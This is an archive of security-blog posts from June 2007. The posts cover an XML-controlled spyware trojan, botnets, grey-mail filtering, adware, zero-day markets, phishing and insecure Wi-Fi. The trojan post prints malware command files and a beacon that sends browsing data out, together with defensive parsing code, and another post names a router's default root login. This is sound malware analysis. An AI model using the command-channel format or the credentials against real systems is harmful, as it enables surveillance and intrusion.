Archive for June, 2007

XML Controlled Trojans

I recently came across an interesting sample. The sample installs a rootkit.

So far nothing interesting, since lots of malware installs a rootkit. The interesting part is how it communicates with a remote site, and how it works.

Once installed on the machine, this Spy-Agent trojan will first communicate with a remote site, and download packages with instructions on how to behave on the machine. The instructions are XML formatted, like the following excerpt:

<?xml version="1.0" encoding="utf-8" ?>
<bootscript name="CoreApp::UrlMonitor" version="100">
    <downloads>
        <download service_name="CoreApp::UrlMonitor">
            <dll url="http://www.[REMOVED]/UrlMonitor.100.z.img" service_version="100" service_exported_as="UrlMonitor_Message_Handler" deleteable="" default="true" />
        </download>
    </downloads>
    <services>
        <service service_name="CoreApp::UrlMonitor">
           <parameters>
              <tn:data bytes="0">
                 <parameters>
                    <parameter name="browsers">
                       <browser name="IExplore" sname="IEXPLORE_SERVER" />
                       <browser name="Firefox" sname="" />
                       <browser name="Opera" sname="" />
                       <browser name="NSShell" sname="" />
                       <browser name="Netscape6" sname="" />
                       <browser name="Netscape Browser" sname="" />
                       <browser name="Mozilla" sname="" />

This file, named UrlMonitor, also tells the trojan to download the package UrlMonitor.100.z.img. Other packages are downloaded as well, such as:

  • core.101.z.img
  • Notifier.104.z.img
  • URLNotifier.101.z.imo

Several other XML instruction files are downloaded too:

  • bootup.exe.xml
  • UrlMonitor.xml

When active, one of its actions is to watch and report machine information and the URLs visited by the user. Here’s an excerpt of a Wireshark network capture:

POST /cmd?op=post_url_ron HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Internet Explorer (compatible)
Host: http://www.[removed].com/
Content-Length: 582
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: AlteonP=xxxxxxxxxxxxxxxxx

<?xml version="1.0" encoding="utf-8"?>
<url-notifier>
  <user-info>
    <user-ip>192.168.x.x</user-ip>
    <user-id>xxxxxxxxxxxxxxxxxxxxxxxxxxxxx</user-id>
    <pub-id>XX8</pub-id>
    <win-majversion>5</win-majversion>
    <win-minversion>1</win-minversion>
    <win-regkey>xxxxx-xxx-xxxxxxxx-xxxxx</win-regkey>
    <useragent>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; V1)</useragent>
    <browser-name>iexplore</browser-name>
    <browser-version>6.00.2900.2180</browser-version>
  </user-info>
  <nids></nids>
  <websites>
    <website>
      <name>xx.msn.com</name>
      <query-strings></query-strings>
    </website>
  </websites>
</url-notifier>

HTTP/1.1 200 OK
Date: Tue, 12 Jun 2007 xx:xx:xx GMT
Server: Apache/1.3.33 (Unix) PHP/4.3.11 mod_perl/1.29
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

66
<?xml version="1.0" encoding="utf-8" ?>
<notification-command>
<!-- empty -->
</notification-command>
0

So, as you can see: well-formed, structured information and communication, all in XML. A few things in the capture stand out for detection purposes: the fixed command endpoint (/cmd?op=post_url_ron), a malformed Host header that carries a scheme and trailing slash, the bare “Internet Explorer (compatible)” User-Agent, and a POST body that starts with an XML declaration despite the form-urlencoded Content-Type. The 66 and 0 in the response are the hexadecimal chunk sizes of the chunked transfer encoding, not part of the command.

Looks like we are getting into the XML trojans…:)
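To show how an analyst would turn the two XML documents above into something actionable, here is an added example (my own code, not part of the original post and not taken from the sample). It parses a bootscript to pull out download URLs, exported service names and targeted browsers, decodes a url-notifier beacon body, and applies a cheap signature to an HTTP request. The two inline documents are constructed from the excerpts above with the host and identifiers replaced and the truncated bootscript closed; note that the bootscript uses a tn: prefix that was never declared, which a strict parser rejects, so the helper binds undeclared prefixes to a placeholder namespace before retrying.

```python
"""Triage helpers for the XML command channel described in this post.

Added example, not code from the sample or the original post. The two inline
documents are constructed from the excerpts above (host and IDs replaced),
with the truncated bootscript closed so it parses. The tn: prefix is left
undeclared on purpose, exactly as in the excerpt.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

SAMPLE_BOOTSCRIPT = """<?xml version="1.0" encoding="utf-8" ?>
<bootscript name="CoreApp::UrlMonitor" version="100">
    <downloads>
        <download service_name="CoreApp::UrlMonitor">
            <dll url="http://www.example.invalid/UrlMonitor.100.z.img" service_version="100" service_exported_as="UrlMonitor_Message_Handler" deleteable="" default="true" />
        </download>
    </downloads>
    <services>
        <service service_name="CoreApp::UrlMonitor">
           <parameters>
              <tn:data bytes="0">
                 <parameters>
                    <parameter name="browsers">
                       <browser name="IExplore" sname="IEXPLORE_SERVER" />
                       <browser name="Firefox" sname="" />
                       <browser name="Opera" sname="" />
                    </parameter>
                 </parameters>
              </tn:data>
           </parameters>
        </service>
    </services>
</bootscript>
"""

SAMPLE_BEACON = """<?xml version="1.0" encoding="utf-8"?><url-notifier><user-info>
<user-ip>192.168.0.10</user-ip><user-id>0123456789abcdef</user-id><pub-id>XX8</pub-id>
<win-majversion>5</win-majversion><win-minversion>1</win-minversion>
<browser-name>iexplore</browser-name><browser-version>6.00.2900.2180</browser-version>
</user-info><nids></nids><websites><website><name>xx.msn.com</name>
<query-strings></query-strings></website></websites></url-notifier>"""

# Prefixes used in start/end tags, e.g. the tn in <tn:data> and </tn:data>.
_PREFIX_RE = re.compile(r"</?\s*([A-Za-z_][\w.-]*):[A-Za-z_]")
# The root element's start tag (the XML prolog starts with <? and is skipped).
_ROOT_TAG_RE = re.compile(r"<[A-Za-z_][\w.:-]*(?=[\s/>])")


def parse_lenient(xml_text):
    """Parse XML that uses namespace prefixes the author never declared.

    expat rejects the undeclared tn: prefix with 'unbound prefix'. Rather than
    lose the sample, bind every such prefix to a placeholder namespace on the
    root element and retry; unprefixed children keep their plain tag names.
    """
    try:
        return ET.fromstring(xml_text)
    except ET.ParseError as exc:
        if "unbound prefix" not in str(exc):
            raise
    prefixes = sorted(set(_PREFIX_RE.findall(xml_text)) - {"xml", "xmlns"})
    decls = "".join(f' xmlns:{p}="urn:undeclared:{p}"' for p in prefixes)
    patched = _ROOT_TAG_RE.sub(lambda m: m.group(0) + decls, xml_text, count=1)
    return ET.fromstring(patched)


def extract_bootscript_iocs(xml_text):
    """Pull out what an analyst would block or hunt for in a bootscript."""
    root = parse_lenient(xml_text)
    dlls = list(root.iter("dll"))
    return {
        "bootscript": root.get("name"),
        "download_urls": [d.get("url") for d in dlls if d.get("url")],
        "exports": [d.get("service_exported_as") for d in dlls],
        "services": sorted({s.get("service_name") for s in root.iter("service")}),
        "browsers": [b.get("name") for b in root.iter("browser")],
    }


def _text(node, path):
    return (node.findtext(path) or "").strip()


def parse_url_notifier(body):
    """Decode one post_url_ron beacon into the fields the server receives."""
    root = ET.fromstring(body)
    if root.tag != "url-notifier":
        return None
    return {
        "user_id": _text(root, "user-info/user-id"),
        "pub_id": _text(root, "user-info/pub-id"),
        "windows": _text(root, "user-info/win-majversion") + "." + _text(root, "user-info/win-minversion"),
        "browser": (_text(root, "user-info/browser-name") + " " + _text(root, "user-info/browser-version")).strip(),
        "sites": [_text(w, "name") for w in root.iter("website")],
    }


def looks_like_beacon(request_target, body):
    """Cheap signature: the op=post_url_ron query or a url-notifier XML body."""
    query = parse_qs(urlsplit(request_target).query)
    if "post_url_ron" in query.get("op", []):
        return True
    try:
        return ET.fromstring(body).tag == "url-notifier"
    except ET.ParseError:
        return False


if __name__ == "__main__":
    print(extract_bootscript_iocs(SAMPLE_BOOTSCRIPT))
    print(parse_url_notifier(SAMPLE_BEACON))
    print(looks_like_beacon("/cmd?op=post_url_ron", SAMPLE_BEACON))
```

The placeholder namespace is only there to get a tree out of the file; nothing downstream should key on it. In practice the download URLs and the export name go straight into blocklists and YARA strings, and looks_like_beacon is the kind of check you would hang off a proxy log rather than the malware’s own User-Agent string, which is trivially changed.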

FBI’s ‘Bot Roast’

Are you one of the millions who’s been infected by a bot?

If you have, the FBI wants to hear about it.

The agency has recently launched “Operation Bot Roast” to coordinate and bring more visibility to their efforts to dismantle botnets. As part of the effort, they’re trying to get people who have been infected with bots to file a complaint through their Web site. If you know that you’ve been infected, please go and file a complaint report. Every report helps identify these criminals and bolster the case against them.

(An anti-phishing reminder: The FBI will not contact you online and request your personal information–you must go to them to make the report.)

So if you’ve been infected, you can do your part to make the net a safer place!

SiteAdvisor Blog Love

Our SiteAdvisor researchers have their own blog. It’s got fascinating content: these guys get to see all the nasties the web has to offer, so they have a fascinating array of videos, images and in-depth analysis of malware and phishing attacks.

Their most recent post is about hosting sites being targeted as places to host drive-by exploits. This underscores the trend we’ve been seeing of cybercriminals staying on the cutting edge of technological innovation. Whenever there’s something new they can use that makes hiding and distributing their creations easier or more effective, they’ll be on it like rats on a Cheeto.

Be sure to add their blog to your list of sites to check for the latest news on all things web-security related!

Running the Grey Mail Gauntlet

A while ago over at Security Insights, McAfee CTO Chris Bolin blogged about grey spam. As far as content-based analysis goes, it is a tricky area for anti-spam vendors.

Mass email can roughly be categorised into three groups:

  • Real spam: the dubious pills, the get-rich-quick scams, phishing, etc. Everyone hates that, but if you have a good anti-spam solution in place you should end up seeing a very small percentage of what was sent to you.
  • Mass-marketing mail: the kind of stuff your bank sends out to each one of its customers. Some of that is useful; some of it you might not care about. Usually if you ask, your bank will stop emailing you.
  • Grey-mail spam: This lies somewhere between the top two. This is the stuff that cannot really be classified as spam. They have valid email addresses and even valid telephone numbers. But it doesn’t matter to you; these emails are just irritating. You really don’t want any of them.

For vendors providing anti-spam solutions, grey mail is a difficult thing to tackle. Any attempt to add too many detection rules risks false positives for good sites like Amazon. It might even place the vendor at risk for legal action from some marketing companies. This makes this form of spam very attractive to many unscrupulous mass-mailing marketeers; they’re willing to run the grey-mail gauntlet.

Don’t get me wrong: I think email marketing has its place and that it can be a very powerful tool, but it should be done ethically. There are many mail-marketing firms that play by the rules, but they can get a bad name because of the bigger group that simply doesn’t care, as long as they can make a few bucks.

To a great extent, remediation for grey spam falls outside the scope of a content-analysis engine. Although the latter can help, it needs input from the customer. Only the customer can determine what is unwanted and what is allowed in this case: one person’s spam is another person’s ham. Chris has listed a number of things you can do to protect yourself, but if you are already receiving grey mail, here are two good techniques for combating it:

  • Blacklists
  • Bayesian

Blacklists: Because grey spam tends to have a defined structure, known sender email addresses, etc., you can use blacklists. These blacklists should be created and updated by the customer and not the vendor.

Bayesian: Bayesian spam filtering might be another solution, but the problem is that it needs to be trained correctly, on both wanted and unwanted mail. The training itself might be too much work for the ordinary home user. Luckily some email clients do a good job of making it easier for a person to use.

Handling false positives: Normally content rules will receive rigorous testing to avoid false positives. When customers introduce blacklists or Bayesian techniques, they are creating custom content rules. As these rules will be ad-hoc, there is a higher chance for false positives. To help with this issue, some form of quarantine system needs to be introduced. The single person at home or in a small company with fewer than 10 employees might use the rules-and-folders functionality in a decent email client to handcraft a solution. However, for any company with a large number of employees, something more structured is required. McAfee offers the product Quarantine Manager to complement some of its other mail-product offerings.
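To make the three pieces above concrete, here is an added example (my own code, not McAfee’s and not part of the original post): a customer-maintained sender blacklist, a small Bayesian word filter that refuses to score until it has seen both spam and ham, and a quarantine band between the “deliver” and “block” thresholds so that a misfiring ad-hoc rule lands somewhere the user can recover it from. The training messages, senders and thresholds are all constructed for the example.

```python
"""Sender blacklist, Bayesian word filter and quarantine band.

Added example, not McAfee code and not from the original post. Every message,
sender and threshold below is constructed for the example.
"""
import math
import re
from collections import Counter

TOKEN_RE = re.compile(r"[a-z0-9$%]+")

# Constructed training corpus: three grey-mail style messages, three ham.
TRAINING = [
    ("special offer: save 50% on our newsletter subscription, unsubscribe here", True),
    ("limited offer newsletter deals, click to unsubscribe", True),
    ("exclusive deals and offers from our partners, unsubscribe link", True),
    ("meeting moved to 3pm, bring the quarterly report", False),
    ("your statement for march is attached, contact us with questions", False),
    ("can you review the patch before the release tomorrow", False),
]

# Customer-maintained, not vendor-shipped: senders this user never wants.
BLACKLIST = {"noreply@deals.example"}


def tokens(text):
    """Lower-cased word set; presence, not count, drives the model."""
    return set(TOKEN_RE.findall(text.lower()))


class BayesFilter:
    """Bernoulli naive Bayes over word presence with add-one smoothing."""

    def __init__(self):
        self.spam_words, self.ham_words = Counter(), Counter()
        self.spam_msgs = self.ham_msgs = 0

    def train(self, text, is_spam):
        words = tokens(text)
        if is_spam:
            self.spam_words.update(words)
            self.spam_msgs += 1
        else:
            self.ham_words.update(words)
            self.ham_msgs += 1

    def spam_probability(self, text):
        """P(spam | words present), combined in log space to avoid underflow."""
        if not self.spam_msgs or not self.ham_msgs:
            # A one-sided or untrained filter is the home-user failure mode the
            # post warns about; refuse rather than return a meaningless score.
            raise ValueError("train on both spam and ham before classifying")
        total = self.spam_msgs + self.ham_msgs
        log_spam = math.log(self.spam_msgs / total)
        log_ham = math.log(self.ham_msgs / total)
        for w in tokens(text):
            log_spam += math.log((self.spam_words[w] + 1) / (self.spam_msgs + 2))
            log_ham += math.log((self.ham_words[w] + 1) / (self.ham_msgs + 2))
        diff = log_ham - log_spam
        if diff > 700:  # exp() would overflow; the answer is ~0 anyway
            return 0.0
        return 1.0 / (1.0 + math.exp(diff))


def build_filter(training=TRAINING):
    filt = BayesFilter()
    for text, is_spam in training:
        filt.train(text, is_spam)
    return filt


def classify(sender, text, filt, blacklist=BLACKLIST, spam_cut=0.9, ham_cut=0.1):
    """Return 'block', 'quarantine' or 'deliver'.

    A blacklisted sender is blocked without scoring. Otherwise the Bayes score
    decides, and the uncertain band between ham_cut and spam_cut goes to
    quarantine instead of the bit bucket: that band is where the false
    positives of ad-hoc, customer-written rules land, and quarantine is what
    lets the user get them back.
    """
    if sender.lower() in blacklist:
        return "block"
    p = filt.spam_probability(text)
    if p >= spam_cut:
        return "block"
    if p <= ham_cut:
        return "deliver"
    return "quarantine"


if __name__ == "__main__":
    f = build_filter()
    for sender, text in [
        ("news@shop.example", "great offer: new deals in our newsletter, unsubscribe anytime"),
        ("alice@corp.example", "please review the attached report before the meeting"),
        ("bob@corp.example", "our report on the new offer"),
        ("noreply@deals.example", "hello"),
    ]:
        print(f"{classify(sender, text, f):<10} {sender:<24} {text}")
```

With six training messages the third test line (“our report on the new offer”) scores exactly 0.75: mail-shot words and office words cancel out, and that is precisely the message you want held in quarantine rather than silently dropped. Widening the band (lower spam_cut, higher ham_cut) trades fewer lost messages for more quarantine review; the right setting is the customer’s call, not the vendor’s.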

Expect to read more postings on this topic from some of my colleagues at Avert Labs.

When Is WhenU MeMe?

Following up on a tip from my colleagues at McAfee’s SiteAdvisor, I examined an interesting piece of software recently from a provider I’d not heard of before, a product called “MeMe,” made by MeMedia, Inc.

The installation was immediate upon launching the installer, with no EULA or other notification displayed until the software was running. The MeMedia Web site suggests the software is intended to supplement a user’s browsing and general use of the Internet by tracking usage (locally, the software assures) and then proactively searching out and alerting the user to additional content that matches the interest categories that MeMe has identified. The term “meocentrism” is cutely coined on the product’s web site to describe this. I also read a notice that the software may be used “in support of free software,” suggesting potential bundling. Oddly, visiting MeMedia’s home page results only in a page with a logo and “coming soon,” though several subpages are accessible and the software appears to be available and functioning. The interface is designed to resemble a three-dimensional cube, and uses many shadow and animation effects:

Peeking under the hood, I grabbed some of the network traffic to verify that no user-browsing data was in fact being transmitted. I was surprised to find communication with servers in the whenu.com domain, and even parameters being passed in HTTP transmissions such as “&app=whenusave.” Save! (also incarnated as “SaveNow”) is an advertising client product made by WhenU. I did not note any personally identifiable data being transferred to remote systems during a few limited tests, but the indications point to a mechanism similar to what WhenU uses in its advertisement products (running search terms against a local database to preclude the need for sending user data from the local system). It appears that the MeMe software is somehow leveraging WhenU’s infrastructure. Along with many overlapping IP addresses and DNS records, we have indications that MeMedia is in partnership with or wholly owned by WhenU.

Crossing into speculation, I find interesting the apparent repurposing of adware infrastructure as a “usage assistant”; something to help a user find content on general topics of interest rather than simply pushing comparative product offers. The vendor achieves the same goal of connecting a user with specific content; MeMedia could easily define and control the data set that the client software could search to find the user’s identified interests. Vendors could feasibly monetize additions to such a content repository as well as more direct targeted advertising. If my speculation is correct, such a scenario–though not far removed from traditional push-advertising models–might at least be better accepted by users. Although the field of data such a “meocentric” digital helper could sift through might really be a walled garden of sponsored content, the idea seems less intrusive than a pop-up hawking a widget.

On my test environment, which is essentially clean of any usage data, MeMe “found” an article on Michael Vick for me after running for several minutes. This occurred even without my doing any browsing or other activity. I later found that several terms were apparently hard coded into the installer package (ExecuteParameters="/i\"rock;Chicago Bears;Serena Williams;Michael Vick\""), ensuring that the recipient would at least have some “interests” about which content could be “found” right off the bat.

It’s awfully kind of them to look out for us boring folk.  ;-)

Zero-Day Threats, Part 2: Who’s Behind Them and Why?

In part 1 of this blog series, I presented a definition for zero-day threats. Now that we know what they are, let’s explore how they come to be–why they exist.

Many years ago security researchers discovered vulnerabilities in software and took their findings to the manufacturer, or vendor. Oftentimes they, or their findings, were either ignored or not taken seriously. Out of frustration researchers began seeking other means to have their issues properly addressed, and their voices heard. (For more on this, listen to McAfee’s AudioParasitics podcasts Episode 4 & Episode 5 with special guest Stuart McClure.)

Back then, fighting “for the people” and making software more secure were certainly motivating factors for researchers; and of course notoriety and peer praise played a role.

Nowadays there is another primary motivating factor: money. The rewards range from the few hundred dollars that vendors like Mozilla pay, to the thousands of dollars that companies such as VeriSign iDefense, 3Com TippingPoint, Digital Armaments and, more recently, Netragard’s SNOsoft fork over, to the many thousands of dollars offered by private companies and individuals on the black market.

Vulnerability Bounty Programs

Vendor              Date Announced
iDefense            Aug-02
Mozilla             Aug-04
TippingPoint        Jul-05
iDefense            Jul-05 (doubled bounty)
Digital Armaments   Oct-05
Netragard           Jan-07

iDefense Vulnerability Challenges

Period    Challenge                                  Bounty
Q2/3-07   Critical infrastructure vulnerabilities    $16k-$24k
Q1-07     Critical Vista & IE7 vulnerabilities       $8k-$12k
Q4-06     Critical IM vulnerabilities                $10k
Q3-06     Critical browser vulnerabilities           $10k
Q2-06     Critical database vulnerabilities          $10k
Q1-06     Critical Microsoft vulnerabilities         $10k

Charlie Miller recently published a paper entitled The Legitimate Vulnerability Market: Inside the Secretive World of 0-day Exploit Sales describing the challenges of selling vulnerability information. As discussed in this paper, there are a number of obstacles when trying to line up a buyer, negotiate a fair price, prove the validity of the vulnerability, and close the deal without either party getting burned. Many researchers who are fed up with these problems opt to trade in the currency of fame rather than fortune. Some of these researchers have contributed to various “Month of X Bug” projects, blogs built for the regular and scheduled disclosure of vulnerabilities. The first few of these projects got quite a bit of attention, but now that there have been seven of them, they are becoming tiresome.

So why buy a zero-day threat? Research organizations created bounty programs to buy zero-day threats to protect and share the vulnerabilities with their customers, for marketing and press–oh–and to notify the vendor to patch the problem. Private parties must buy them for the same reasons, yes? Wait a moment, private parties have no customers and they don’t want the attention of press. Why would they want the vulnerability patched? That would only devalue the information. What are the remaining reasons for them to purchase these vulnerabilities? To carry out attacks, of course, or to resell the threats. It’s also conceivable that in an age of cyberwarfare, governments may purchase zero days to both remove the threat from the market and to beef up their defenses.

Tune in next week for Zero-Day Threats, Part 3: When & How Are They Released?

Revisiting the Crystal Ball: Updating Our 2007 Predictions

At the midyear mark when the sun is at its farthest point north—at least in our hemisphere—it seems appropriate to revisit our predictions for the Top 10 security threats in 2007. Just how good was the McAfee Avert Labs team at reading the tea leaves six months ago?

I conferred with my colleagues in Avert Labs and rounded up the latest data to see if the facts support our prognostications. Let’s revisit our forecast and see how well we did. I decided to score each prediction on a scale of 1 to 5, with 5 being the highest possible score for excellence in crystal ball gazing. (These are in no particular order.)

1. Password-stealing web sites are on the rise.
Score: 5

We continue to see exponential growth in phishing sites. Based on the number of sites blocked by our phishing traps, activity in January alone increased by 358 percent vs. the entire fourth quarter of 2006. February and March rose by at least 200 percent each compared to the same period. In total, the first three months of this year saw a 784 percent increase—with no slowdown in sight.

We also anticipate an increase in the abuse of open-content sites, such as Google and Wiki pages. Google accounts can be used to host drop boxes (via Gmail) or phishing sites (Google Docs). Even Internet archive sites will suffer.

2. Spam, particularly image spam, is on the increase.
Score: 3

The total volume of trap-based spam has stayed fairly flat during the first part of the year. Image spam accounted for 65 percent of all spam at the beginning of the year and has now declined a bit. Image spam, which has messages embedded in images rather than text (typically pump-and-dump stocks, pharmacy, and degree spam), is still a force to be reckoned with. It hovers between 30 and 50 percent of all spam that tries to find its way into users’ inboxes.

3. The popularity of video on the web makes it a target for hackers.
Score: 4

There’s no doubt that hackers are riding the wave of online video available on hugely popular social networking sites like YouTube and MySpace. Astute social engineering— coupled with video’s inherently easy-to-program format—has enabled cybercriminals to come up with a variety of clever tricks. Witness these recent MySpace exploits:

Earlier this year, hackers targeted fans of the French rock band MAMASAID. When fans visited a MySpace account promoting the music group, they’d get a Trojan called JS/SpaceStalk installed on their computers through an insecure feature in QuickTime, HREF Tracks, which allows links to be opened automatically when you run a movie. This link was misused to lure visitors to malicious web sites hosting spyware and other exploit code.

MySpace has also been the target of phishing scams. After gathering MySpace user credentials from phishing sites, spammers log in to accounts and then post spam messages on other accounts. It’s an issue because MySpace can’t close down legitimate user accounts.

4. Mobile phone attacks will become more prevalent.
Score: 0

Surprisingly, mobile malware numbers are down for the first quarter of 2007 (12 attacks), compared to the first quarter of 2006 (47).

5. Adware will go mainstream.
Score: 3

Because adware has gotten such a bad rap, businesses are experimenting with more creative ways to deliver ads on the Internet. BitTorrent is setting a trend by offering free ad-supported downloads rather than paid downloads for its online TV network, so customers see ads before and after watching an episode or a movie—much like traditional television. YuMe Networks is also likely to follow this model.

6. Identity theft and data loss will continue to be a public issue.
Score: 5

According to Attrition’s Data Loss Database—Open Source, more than 13.7 million records have been breached thus far. Compare that to 1.8 million during the same period last year! We maintain our belief that the unauthorized transmission of information will become more of a risk for enterprises. This includes loss of customer data, employee personal information and intellectual property from a variety of channels—applications, networks, and even physical channels, like USB devices, printers, fax and removable storage. If you want to get a more detailed picture of how grave the problem is, take a look at the recent Datamonitor report [“Datagate: The Next Inevitable Corporate Disaster?”] According to the report, more than 60 percent of respondents interviewed experienced data loss within the last year, and an astounding 33 percent believe it could put them out of business!

7. The use of bots will increase.
Score: 3

The statistics from our daily collections show that bots actually declined to a low point in November 2006, but are now increasing again. The numbers aren’t as high as they were 12 months ago, but they’re definitely heading up.

8. Parasitic malware will make a comeback.
Score: 5

There’s no doubt about this one. Philis and Fujacks continue to be active parasitic families, and Avert Labs has classified more than 150 new variants of these two families since the start of 2007. And let’s not forget other families like Sibil, Grum, and Expiro.

9. The number of rootkits on 32-bit platforms will increase.
Score: 4

According to our Virus Tracking Map, approximately 200,000 systems reported rootkit infestations since the beginning of 2007, a 10 percent increase over the first quarter of 2006. (By the way, if you want to check your system, download our free Rootkit Detective. And, of course, VirusScan Enterprise includes anti-rootkit technology.)

10. Vulnerabilities will continue to cause concern.
Score: 5

Not only do they continue to cause concern, there are more of them to worry about than ever before. In January and February 2006, Microsoft issued patches for five important and five critical vulnerabilities. During the same months this year, Microsoft patched nine important and 27 critical vulnerabilities.

So, when all is said and done, it looks like our oracles hit the mark in most areas. Stay tuned for a re-evaluation of these trends later this year.

nic.at bitten by Spamhaus for helping phishers.

The .at domain registry nic.at has publicly given a green light to phishers to use its top-level domain without fear of their domain names being revoked. nic.at suggests in a recent news article that its hands are legally tied when it comes to revoking registrations used solely for fraud. I should note, however, that they say they do not support fraudulent activity.

The Spamhaus listing for nic.at is here. I very much doubt the listed domain has any legitimate use, so I’ll happily validate the data Spamhaus presents: for example, besthkd was used in a URL similar to the following:
http://ebanking-se[removed]t/folder-name/client-form/form.aspx

However, we have lots(!) of samples from some days before the one Spamhaus has recorded for this domain, which raises a question: was this a longer-than-normal attack?

Looking at our data warehouse I can see lots of samples covering some six-and-a-bit days! That’s one amazingly long campaign when, with professional help, brand owners can get a phishing site taken down in about 6 hours on average. There has been some growth in phishing attacks recently, as I’m sure you’re all aware, but this “we’re frightened about liability” behaviour is very disappointing.

Common sense needs to prevail!

In fact, I’m reminded of the 2 laws of sudo

We trust you have received the usual lecture from the local System Administrator. It usually boils down to these two things:

#1) Respect the privacy of others.
#2) Think before you type.

…and they are in that order for a reason!

I would like to respectfully suggest the following: since your contract is with the owner of the domain, ensure that the contract can be broken in exceptional circumstances. I’m not sure I know of anywhere where fraud is not a crime, so that’s another basis on which you can act.
Spamhaus gives good advice on their listing too:

Nic.at needs to urgently set up communication channels with the
various professional investigators who are investigating phishing:
and of course to review their policies on not taking down domains
being used for phishing.

You can read a full rundown by David Goldstein here.

Sorry for ranting, but in the wise (although edited!) words of Schalk “If you stir the poop and it smells bad people do something about it.“.

The last word: nic.at, you are part of the problem. Grow some balls and “Respect the privacy of others”.

Insecure Wi-Fi

In a recent press event in San Francisco my colleague Craig Schmugar revisited our predictions for the Top 10 security trends of 2007. Among other remarks he said that online criminals are looking for new areas to exploit–such as municipal Wi-Fi–but added we haven’t heard of any real-world attacks.

Meanwhile security professional Dave Whitelegg in his blog writes about the possible appearance of Wi-Fi botnets in the near future.

Looks like Whitelegg hit the target: If you are travelling in France and envisage connecting your computer to some available wireless networks, you might be surprised. Last week in Paris’ Gare du Nord (the Eurostar train station), we saw some unexpected hotspot names.

I found this screenshot on two French blogs (here and here). You don’t need to speak French to notice a few curious names. Undoubtedly the hotspots were hacked and renamed.

Given these particular names, it’s hard to imagine a professional phishing or “man-in-the-middle” attack. We seem to have just childish behaviour. One inquisitive investigator (nicknamed Redeye) looked into the origin of this phenomenon. He found a vulnerable SNCF router. (SNCF is the French National Railway Company.) According to his inquiry, the router was simply badly configured:

  • Open ports:
    • 22 (SSH with the default login and password: root/admin)
    • 53
    • 80
    • 443
    • 448
    • 8080
    • 8081
    • 8082
  • An nmap log indicated the MAC address.

This setup was so insecure that it was possible to access the admin router page!

I also have heard rumours of fake free Wi-Fi access appearing here and there. People would be prompted to use these lure networks; then they would be trapped and their data stolen.

Is this phishing or a botnet? Fun or fraud? I don’t know, but in the near future wireless networks will be a new target. Today young hackers are playing with this; tomorrow cybercriminals will take over from them. We must be vigilant: check and double-check that you are connected to a genuine infrastructure access point rather than to a peer-to-peer (ad-hoc) network. I also recommend that you systematically use a VPN (virtual private network) client to create a secure tunnel between you and the Internet.

Infected E-Mail Makes a Poor Ambassador

Relations between the United States and Russia have been a bit testy of late, but is that any reason for those interested in the U.S. perspective to start receiving virus-laden e-mails? Yes, you read that right.

At the United States Moscow Embassy Web site, we signed up anonymously at the “Information Resource Center” over the course of several months with two unique addresses. Both times, we received e-mails containing the W32/Stration.dr virus.

This could indicate a number of things. At minimum, the e-mail addresses submitted to moscow.usembassy.gov are not secure. It could be that some information (specifically e-mail addresses) is insecure or accessible by an outside party, or it could be that someone with access to this list is infected with a virus. To be clear, we don’t think the U.S. government is deliberately sending infected e-mails. But the fact that this occurred to two separate e-mail accounts submitted on two separate occasions does make it unlikely that this is a fluke.

Tom Goetz, the engineer who handles SiteAdvisor’s e-mail testing, is the one who noticed this nugget of data among the many millions of e-mail tests we’ve run. This is the first dot gov Web site that McAfee has rated “red.” Tom notes that we started scanning test-generated e-mail for viruses about 10 months ago. During that period, we found 17,434 infected e-mails–out of the roughly 18 million we received over the last 12 months. That’s about one-tenth of a percent.

The e-mails were part of a mailing list that included things such as press releases. Maybe someone at the State Department just doesn’t like journalists. Or maybe the United States is the new proxy in Estonia’s cyberwar with Russia.

Whatever the cause, we’ve alerted the proper authorities.